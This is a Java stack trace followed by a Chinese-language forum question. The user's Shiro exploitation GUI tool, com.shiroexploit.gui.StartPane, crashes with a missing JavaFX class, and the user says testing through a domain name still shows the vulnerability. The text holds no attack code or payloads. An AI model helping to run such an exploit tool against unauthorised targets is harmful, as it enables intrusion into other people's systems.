	at javafx.graphics/com.sun.javafx.application.PlatformImpl.lambda$runLater$10(PlatformImpl.java:447)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at javafx.graphics/com.sun.javafx.application.PlatformImpl.lambda$runLater$11(PlatformImpl.java:446)
	at javafx.graphics/com.sun.glass.ui.InvokeLaterDispatcher$Future.run(InvokeLaterDispatcher.java:96)
Caused by: java.lang.ClassNotFoundException: com.sun.javafx.scene.control.skin.BehaviorSkinBase
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	... 44 more
Exception running application com.shiroexploit.gui.StartPane

但是通过域名测试就有漏洞,请问各位大大这估计是哪里的问题,该怎么解决?